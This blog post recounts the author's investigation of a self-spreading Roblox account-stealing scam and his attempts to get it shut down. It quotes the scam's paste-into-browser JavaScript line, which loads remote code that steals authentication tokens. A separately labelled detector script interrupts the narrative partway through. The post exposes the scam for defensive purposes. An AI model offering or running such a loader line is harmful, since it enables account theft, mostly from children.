Daniel's stuff

Dismantling a Roblox Scam

September 21, 2020

James 3:16: For where jealousy and selfish ambition exist, there will be disorder and every vile practice.


On January 28th, 2020, I decided to visit Roblox to check up on things a bit. I am almost never active there, and only log in every month or so. I noticed that I was sent a message by a Roblox friend, asking me a harmless question.

hi dude
i'm making a game and I wanna put your roblox character into it
could you upload your roblox char texture as a decal and send the link to me
here's a tutorial on how to do it if you don't already know:

They linked me to a YouTube tutorial, and I was instantly suspicious that it was a scam. In the YouTube video, I was prompted to run this JavaScript in my browser:

$.get('//rblx.link')

"rblx.link" runs remote code from a third-party website. That code grabs your Roblox authentication key, sends it to their server, and then redirects you to the profile texture as expected. When I clicked on my friend's profile, they were wearing red and blue Roblox clothes, and the description had been changed to:
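The snippet above is dangerous precisely because `//rblx.link` is a protocol-relative URL: the browser resolves it against the page's own scheme, so it silently becomes a request to a completely different origin. The following is an added example, not code from the original post, that resolves the targets of jQuery/fetch loader calls in a pasted snippet against the page URL and flags any that leave an assumed allowlist of trusted origins; the allowlist and the sample snippets are constructed for illustration.

```javascript
// Added example: flag "tutorial" snippets that load code or data from a third-party
// origin, resolving protocol-relative URLs (//host) the way the browser would.

// Matches $.get(...), $.getScript(...), $.ajax(...) and fetch(...) with a quoted URL.
const LOADER_CALL = /(?:\$|\bjQuery)\.(get|getScript|ajax)\(\s*(['"])(.*?)\2|\bfetch\(\s*(['"])(.*?)\4/g;

// Assumed allowlist: origins a snippet run on the Roblox site may legitimately talk to.
const TRUSTED_ORIGINS = new Set(['https://www.roblox.com', 'https://roblox.com']);

// Resolve a raw URL argument against the page URL; returns null if it is not a valid URL.
function resolveTarget(rawUrl, pageUrl) {
  try {
    return new URL(rawUrl, pageUrl);
  } catch {
    return null;
  }
}

// Return one finding per loader call found in the snippet.
function classifySnippet(snippet, pageUrl = 'https://www.roblox.com/') {
  const findings = [];
  for (const m of snippet.matchAll(LOADER_CALL)) {
    const call = m[1] || 'fetch';
    const rawUrl = m[3] !== undefined ? m[3] : m[5];
    const url = resolveTarget(rawUrl, pageUrl);
    findings.push({
      call,
      rawUrl,
      resolved: url ? url.href : null,           // e.g. '//rblx.link' -> 'https://rblx.link/'
      protocolRelative: rawUrl.startsWith('//'),
      thirdParty: url ? !TRUSTED_ORIGINS.has(url.origin) : true, // unparseable counts as untrusted
    });
  }
  return findings;
}

// A snippet is suspicious if any loader call reaches outside the trusted origins.
function isSuspicious(snippet, pageUrl) {
  return classifySnippet(snippet, pageUrl).some(f => f.thirdParty);
}

// Constructed samples: the scam's snippet from the post, and a harmless same-origin fetch.
console.log(classifySnippet("$.get('//rblx.link')"));
console.log(isSuspicious('fetch("/home")'));
```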

Ask your parents to vote for Trump this year!

MAGA2020

They had messed with the wrong person, and were going to pay.

I spent a few days studying the fraud and came up with a clear explanation of the process:

It started with a data breach, which the scammer took advantage of to compromise an initial set of accounts. When an account is hacked, its Robux is stolen and the account is filled with Trump propaganda. The system then messages all of the victim's friends with the same message, so the number of hacked accounts grows exponentially.

I tracked the fraud site's hosting provider to DigitalOcean, so I reported it and they quickly removed it, effectively shutting it down.

That lasted 5 hours.

After their host took them down, they quickly relocated to a lesser-known Netherlands-based host and changed the video description to point at a new port on the same domain. I followed up by reporting the abusive website to the new host. They didn't respond.

In an effort to slow down the system, I wrote a script to generate fake requests and send them to the server. This would mix the real and fake requests together, drastically slowing down the process of breaking into accounts. I proceeded to send hundreds, and sometimes thousands, of fake requests over a period of a few days. Although this was very effective, some websites only allowed 1 visit per IP address. I could just renew Tor sessions, but it wasn't nearly as effective.

Who's Affected?

While this was running, I started to do some research on other people’s experiences with the scam.

After searching more, I figured out it wasn't just one site but many, although the Trump propaganda accounts seem to be the most popular. Simply looking through YouTube shows that many people have been setting up servers to steal accounts in exactly the same way the Trump one did. There are even tutorials on YouTube showing you how to set it up, and showing behind the scenes how it works.

I went through as many scam sites as I could. One even sent the executable JavaScript encoded in JSFuck.

I modified my script to be interchangeable between as many fraud sites as I could find, and started spamming again. At the time, this was very secret. I didn't want anybody to be able to find the weaknesses of all the scams.

A Conclusion

"Robux" is the problem with Roblox. More specifically, getting children to join a community based on a digital currency is a bad idea. Sure, it brings people together and lets you make friends. The idea sounds fun in theory, but it is unavoidably very problematic in practice. An even worse idea is the ability to exchange Robux for real-life currency. This is what allows adults to take advantage of the platform.

Kids want free Robux. They will do anything and everything to obtain it. The people on the other end do everything they possibly can to make their "Robux generators" look legit. This includes things like adding fake chat rooms, fake recent activity, and even hosting PDF files on local government websites.

And it works.

I’m not trying to blame scams entirely on Roblox’s design. Simply put, when you add digital currency into a game, it becomes more about the currency and not the game itself.

Contacting Roblox

As my motivation to kill off Roblox scams died off, I decided to send some emails to the Roblox team. Their replies seemed to be written very quickly, and more importantly, it doesn't look like they passed it on to the Roblox security team.

Here is one of the emails I sent them:

As the scam takes over many accounts, banning each one will not be effective,
especially since they were hacked into in the first place.

I meant not a popup message on the main page, but a message to their inbox,
the same place where you get messages on the latest "Wonder Woman Items". It would greatly increase awareness about the current situation, and help the Roblox community to continue to be a safe place.

Also, it is strange that Youtube links are able to be sent and can pass
through your messaging system, assuming it was not already fixed.

And they responded:

Hello Dan,

Thank you for your reply.

Although we may not be able to follow up further, we do value and use player ideas and suggestions to bring new features and awareness to Roblox.

We would also like to inform you that once you use the 'Report Abuse' option a ticket is generated and may take a few minutes to reach one of our live moderation agents. ROBLOX moderators are a team of employees who work diligently around the clock to review and apply appropriate consequences when necessary.

Please note that just because you have reported someone does not mean our team will immediately remove the player from the website for days at a time. We have a procedure that we follow for every user on the website and for every situation. You may not know what type and length of moderation another user's account will receive, as it is private but all accounts caught violating ROBLOX rules will be moderated.

The important part here to understand is that privacy rules do not permit us to share moderation actions taken against other accounts, but all accounts caught violating ROBLOX rules will be moderated.

Therefore, you will never know if the action was actually taken, rest assured, we always take action according to the nature of the violation.

If you need help with something else, please let us know here.

Sincerely,
Simon

The response was most likely generated, although in the first email one line seemed to be unique:

We appreciate you taking the time to write in with your feedback for Roblox and want to confirm that your suggestion regarding issuing a warning message to the users regarding this propaganda has been received.

This means they are completely fine with sending messages encouraging children to purchase Robux, but they can’t send a warning about a fraud destroying their community?

I guess we'll never know...

Further reading: https://www.androidauthority.com/in-app-purchases-good-bad-ugly-truth-324604/